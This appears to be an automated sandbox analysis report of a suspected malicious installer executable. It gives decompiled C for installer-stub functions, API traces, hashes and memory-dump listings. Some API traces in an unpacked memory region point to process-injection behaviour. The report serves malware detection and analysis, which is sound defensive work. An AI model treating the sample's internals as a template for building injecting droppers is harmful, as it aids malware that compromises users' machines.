                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                          • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
                                          • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll$Ivlfdpdlcleoxmzl
                                        • API String ID: 1152937526-1841927513
                                        • Opcode ID: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                        • Instruction ID: f975a3bedda6f2933beab8fd4359c2ae6630d988b8a67772af92d786c35f871c
                                        • Opcode Fuzzy Hash: 23fd552162e1cb78e30f3aeb6829a794e94d33adf5882a54a3d0554285ad8cdc
                                        • Instruction Fuzzy Hash: 0141E471901504BBDF117FA5CD869AF3AA9EF42328B20423BF512F11E1C73C4A41CAAD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402EBD, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 173fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 95%
                                        			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t68;
				void* _t69;
				int _t74;
				long _t75;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				void* _t99;
				void* _t100;
				long _t101;
				int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t99 = _a12;
				_v12 = _t102;
				if(_t99 == 0) {
					_v12 = 0x8000;
				}
				_v8 = 0;
				_v16 = _t99;
				if(_t99 == 0) {
					_v16 = 0x78d938;
				}
				_t66 = _a4;
				if(_a4 >= 0) {
					E004030FF( *0x7a2fd8 + _t66);
				}
				_t68 = E004030CD( &_a16, 4); // executed
				if(_t68 == 0) {
					L44:
					_push(0xfffffffd);
					goto L45;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t99 != 0) {
							if(_a16 < _t102) {
								_t102 = _a16;
							}
							if(E004030CD(_t99, _t102) != 0) {
								_v8 = _t102;
								L47:
								return _v8;
							} else {
								goto L44;
							}
						}
						if(_a16 <= 0) {
							goto L47;
						}
						while(1) {
							_t103 = _v12;
							if(_a16 < _t103) {
								_t103 = _a16;
							}
							if(E004030CD(0x789938, _t103) == 0) {
								goto L44;
							}
							_t74 = WriteFile(_a8, 0x789938, _t103,  &_a12, 0); // executed
							if(_t74 == 0 || _t103 != _a12) {
								L30:
								_push(0xfffffffe);
								L45:
								_pop(_t69);
								return _t69;
							} else {
								_v8 = _v8 + _t103;
								_a16 = _a16 - _t103;
								if(_a16 > 0) {
									continue;
								}
								goto L47;
							}
						}
						goto L44;
					}
					_t75 = GetTickCount();
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_v20 = _t75;
					 *0x40b038 = 0xb;
					 *0x40b050 = 0;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L47;
					}
					while(1) {
						L10:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E004030CD(0x789938, _t104) == 0) {
							goto L44;
						}
						_a16 = _a16 - _t104;
						 *0x40b028 = 0x789938;
						 *0x40b02c = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b030 = _t100;
							 *0x40b034 = _v12;
							_t79 = E00405D9D(0x40b028);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b030; // 0x78e938
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x4092a0 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404D62(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L10;
								}
								goto L47;
							} else {
								if(_a12 != 0) {
									_v12 = _v12 - _t106;
									_v8 = _v8 + _t106;
									_t82 =  *0x40b030; // 0x78e938
									_v16 = _t82;
									if(_v12 < 1) {
										goto L47;
									}
									L25:
									if(_v28 != 4) {
										continue;
									}
									goto L47;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L30;
								} else {
									_v8 = _v8 + _t106;
									goto L25;
								}
							}
						}
						_push(0xfffffffc);
						goto L45;
					}
					goto L44;
				}
			}



























                                        0x00402ec5
                                        0x00402ec9
                                        0x00402ed0
                                        0x00402ed3
                                        0x00402ed5
                                        0x00402ed5
                                        0x00402ede
                                        0x00402ee1
                                        0x00402ee4
                                        0x00402ee6
                                        0x00402ee6
                                        0x00402eed
                                        0x00402ef2
                                        0x00402efd
                                        0x00402efd
                                        0x00402f08
                                        0x00402f0f
                                        0x004030bb
                                        0x004030bb
                                        0x00000000
                                        0x00402f15
                                        0x00402f19
                                        0x0040305e
                                        0x004030ab
                                        0x004030ad
                                        0x004030ad
                                        0x004030b9
                                        0x004030c0
                                        0x004030c3
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004030b9
                                        0x00403063
                                        0x00000000
                                        0x00000000
                                        0x0040306a
                                        0x0040306a
                                        0x00403070
                                        0x00403072
                                        0x00403072
                                        0x0040307e
                                        0x00000000
                                        0x00000000
                                        0x0040308b
                                        0x00403093
                                        0x00403058
                                        0x00403058
                                        0x004030bd
                                        0x004030bd
                                        0x00000000
                                        0x0040309a
                                        0x0040309a
                                        0x0040309d
                                        0x004030a4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004030a6
                                        0x00403093
                                        0x00000000
                                        0x0040306a
                                        0x00402f1f
                                        0x00402f25
                                        0x00402f25
                                        0x00402f2c
                                        0x00402f32
                                        0x00402f39
                                        0x00402f3f
                                        0x00402f42
                                        0x00000000
                                        0x00000000
                                        0x00402f4d
                                        0x00402f4d
                                        0x00402f4d
                                        0x00402f55
                                        0x00402f57
                                        0x00402f57
                                        0x00402f63
                                        0x00000000
                                        0x00000000
                                        0x00402f69
                                        0x00402f6c
                                        0x00402f72
                                        0x00402f78
                                        0x00402f78
                                        0x00402f83
                                        0x00402f89
                                        0x00402f8e
                                        0x00402f95
                                        0x00402f98
                                        0x00000000
                                        0x00000000
                                        0x00402f9e
                                        0x00402fa4
                                        0x00402fa6
                                        0x00402fb3
                                        0x00402fb5
                                        0x00402fe3
                                        0x00402fe9
                                        0x00402ff2
                                        0x00402ff7
                                        0x00402ff7
                                        0x00402ffe
                                        0x0040304c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403000
                                        0x00403003
                                        0x00403025
                                        0x00403028
                                        0x0040302b
                                        0x00403034
                                        0x00403037
                                        0x00000000
                                        0x00000000
                                        0x0040303d
                                        0x00403041
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403047
                                        0x00403011
                                        0x00403019
                                        0x00000000
                                        0x00403020
                                        0x00403020
                                        0x00000000
                                        0x00403020
                                        0x00403019
                                        0x00402ffe
                                        0x00403054
                                        0x00000000
                                        0x00403054
                                        0x00000000
                                        0x00402f4d

                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402F1F
                                        • GetTickCount.KERNEL32 ref: 00402FA6
                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FD3
                                        • wsprintfA.USER32 ref: 00402FE3
                                        • WriteFile.KERNELBASE(00000000,00000000,0078E938,7FFFFFFF,00000000), ref: 00403011
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CountTick$FileWritewsprintf
                                        • String ID: ... %d%%$8x
                                        • API String ID: 4209647438-795837185
                                        • Opcode ID: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                        • Instruction ID: 8577ea5e15ae9603690e1c5729624cd70e3502ed31cd2bd6b1ef147789401905
                                        • Opcode Fuzzy Hash: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
                                        • Instruction Fuzzy Hash: 9E61AB3191220AEBCF10DF65DA48A9F7BB8EB04755F10417BF911B32C0D3789A40CBAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 028411F5, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 350memoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 0284152A
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02841589
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.660079637.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                        Similarity
                                        • API ID: AllocCreateFileVirtual
                                        • String ID: 230fc8508bdb4912ad5d95967b73d200
                                        • API String ID: 1475775534-2327637551
                                        • Opcode ID: 0f8b0954afaee3e2d7d39e35a3e06a42f8be76c1b20ad684bca408e5066ec7e2
                                        • Instruction ID: 3bb9e81587943ba8efac719381c75a0c7469d936bcf2d5b1d4254782b4751488
                                        • Opcode Fuzzy Hash: 0f8b0954afaee3e2d7d39e35a3e06a42f8be76c1b20ad684bca408e5066ec7e2
                                        • Instruction Fuzzy Hash: 48E15B28D5439CEEEB61DBE4DC09BEDBBB5AF04714F10408AE60CFA191D7B50A84DB16
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02840723, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02840825
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 028409F2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.660079637.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                        Similarity
                                        • API ID: CreateFileFreeVirtual
                                        • String ID:
                                        • API String ID: 204039940-0
                                        • Opcode ID: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
                                        • Instruction ID: ae88ed338c3e621cea829f0dd0a7684b537f2363d9f83db275578220bdd54369
                                        • Opcode Fuzzy Hash: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
                                        • Instruction Fuzzy Hash: 12A1F339D0020DEFEF14DFE4C985BAEBBB1AF08316F204456E604FA291DB745A90DB11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004015D5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t27;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A9A(0xfffffff0);
				_t27 = E0040555F(_t25);
				if( *_t25 != __ebx && _t27 != __ebx) {
					do {
						_t29 = E004054F7(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L5:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L5;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401428();
				} else {
					E00401428(0xffffffe6);
					E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                        0x004015d5
                                        0x004015dc
                                        0x004015e6
                                        0x004015e8
                                        0x004015ee
                                        0x004015f6
                                        0x004015fc
                                        0x004015fe
                                        0x00401601
                                        0x00401609
                                        0x00401616
                                        0x00401623
                                        0x00401623
                                        0x00401618
                                        0x00401619
                                        0x00401621
                                        0x00000000
                                        0x00000000
                                        0x00401621
                                        0x00401616
                                        0x00401626
                                        0x00401629
                                        0x0040162b
                                        0x0040162c
                                        0x004015ee
                                        0x00401633
                                        0x00401653
                                        0x004021e8
                                        0x00401635
                                        0x00401637
                                        0x00401642
                                        0x00401648
                                        0x00401648
                                        0x00402932
                                        0x0040293e

                                        APIs
                                          • Part of subcall function 0040555F: CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 0040556D
                                          • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405572
                                          • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405581
                                        • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
                                        • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp, xrefs: 0040163D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                        • String ID: C:\Users\user\AppData\Local\Temp
                                        • API String ID: 3751793516-47812868
                                        • Opcode ID: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                        • Instruction ID: 09f96d0d66b1181939c381e70bae2dcc986a56c468c5fc90a5c01fc4095c1b0e
                                        • Opcode Fuzzy Hash: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
                                        • Instruction Fuzzy Hash: B2010831908181ABDB212F695D449BF7BB0DA52364B28463BF8D1B22E2C63C4946D63E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004056BF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E004056BF(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                        0x004056c3
                                        0x004056c9
                                        0x004056ca
                                        0x004056ca
                                        0x004056cb
                                        0x004056d2
                                        0x004056dc
                                        0x004056e9
                                        0x004056ec
                                        0x004056f4
                                        0x00000000
                                        0x00000000
                                        0x004056f8
                                        0x00000000
                                        0x00000000
                                        0x004056fa
                                        0x00000000
                                        0x004056fa
                                        0x00000000

                                        APIs
                                        • GetTickCount.KERNEL32 ref: 004056D2
                                        • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403148,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,C:\Users\user\AppData\Local\Temp\), ref: 004056EC
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004056C2
                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056BF
                                        • nsa, xrefs: 004056CB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
                                        • API String ID: 1716503409-3657371456
                                        • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                        • Instruction ID: fc1e422234f16816b4991f84e515e98fc6b5cd585f65b5bef5412ac6235d785f
                                        • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                        • Instruction Fuzzy Hash: F1F0A036748218BAE7104E55EC04B9B7FA9DF91760F14C02BFA089A1C0D6B1A95897A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02840034, Relevance: 6.6, APIs: 4, Instructions: 561processthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 02840391
                                        • GetThreadContext.KERNELBASE(?,00010007), ref: 028403B4
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 028403D8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.660079637.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                        Similarity
                                        • API ID: Process$ContextCreateMemoryReadThread
                                        • String ID:
                                        • API String ID: 2411489757-0
                                        • Opcode ID: fc7fbc56690095d52b1bba990d0e76867182a7c5ad0c647a721d7dfe2a4e8f79
                                        • Instruction ID: 3caa227cc6613c026e0a1c0b2457c811b2050fc8b30ebd5aacbe37ea8484e896
                                        • Opcode Fuzzy Hash: fc7fbc56690095d52b1bba990d0e76867182a7c5ad0c647a721d7dfe2a4e8f79
                                        • Instruction Fuzzy Hash: BA322739D4021CEFEB24DBA4DC45BAEB7B5BF44704F20409AE609FA2A1DB705A80DF15
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040136D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 73%
                                        			E0040136D(signed int _a4) {
				intOrPtr* _t8;
				int _t10;
				signed int _t12;
				int _t13;
				int _t14;
				signed int _t21;
				int _t24;
				signed int _t27;
				void* _t28;

				_t27 = _a4;
				while(_t27 >= 0) {
					_t8 = _t27 * 0x1c +  *0x7a2fb0;
					__eflags =  *_t8 - 1;
					if( *_t8 == 1) {
						break;
					}
					_push(_t8); // executed
					_t10 = E00401439(); // executed
					__eflags = _t10 - 0x7fffffff;
					if(_t10 == 0x7fffffff) {
						return 0x7fffffff;
					}
					__eflags = _t10;
					if(__eflags < 0) {
						_t10 = E00405936(0x7a4000 - (_t10 + 1 << 0xa), 0x7a4000);
						__eflags = _t10;
					}
					if(__eflags != 0) {
						_t12 = _t10 - 1;
						_t21 = _t27;
						_t27 = _t12;
						_t13 = _t12 - _t21;
						__eflags = _t13;
					} else {
						_t13 = 1;
						_t27 = _t27 + 1;
					}
					__eflags =  *(_t28 + 0xc);
					if( *(_t28 + 0xc) != 0) {
						 *0x7a276c =  *0x7a276c + _t13;
						_t14 =  *0x7a2754;
						__eflags = _t14;
						_t24 = (0 | _t14 == 0x00000000) + _t14;
						__eflags = _t24;
						SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x7a276c, 0x7530, _t24), 0);
					}
				}
				return 0;
			}












                                        0x0040136e
                                        0x004013fb
                                        0x00401382
                                        0x00401384
                                        0x00401387
                                        0x00000000
                                        0x00000000
                                        0x00401389
                                        0x0040138a
                                        0x0040138f
                                        0x00401394
                                        0x00000000
                                        0x00401409
                                        0x00401396
                                        0x00401398
                                        0x004013a6
                                        0x004013ab
                                        0x004013ab
                                        0x004013ad
                                        0x004013b5
                                        0x004013b6
                                        0x004013b8
                                        0x004013ba
                                        0x004013ba
                                        0x004013af
                                        0x004013b1
                                        0x004013b2
                                        0x004013b2
                                        0x004013bc
                                        0x004013c1
                                        0x004013c3
                                        0x004013c9
                                        0x004013d2
                                        0x004013d7
                                        0x004013d7
                                        0x004013f5
                                        0x004013f5
                                        0x004013c1
                                        0x00000000

                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
                                        • SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: 4@
                                        • API String ID: 3850602802-2385517874
                                        • Opcode ID: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                        • Instruction ID: c77d45609a211084429c3166b5231f0613d514cab4ec9a945a8c79bb8836a1de
                                        • Opcode Fuzzy Hash: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
                                        • Instruction Fuzzy Hash: 9201DE726242109FE7184B39DD09B3B36D8E791314F00823EBA52E66F1E67CDC028B49
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403116, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E00403116(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
				E00405BFB(_t6);
				_t2 = E00405538(_t6);
				if(_t2 != 0) {
					E004054CC(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004056BF("\"C:\\Users\\jones\\Desktop\\Y4U48592345670954.exe\" ", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                        0x00403117
                                        0x0040311d
                                        0x00403123
                                        0x0040312a
                                        0x0040312f
                                        0x00403137
                                        0x00403143
                                        0x00403149
                                        0x0040312d
                                        0x0040312d
                                        0x0040312d

                                        APIs
                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                          • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                          • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                        • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp Download File
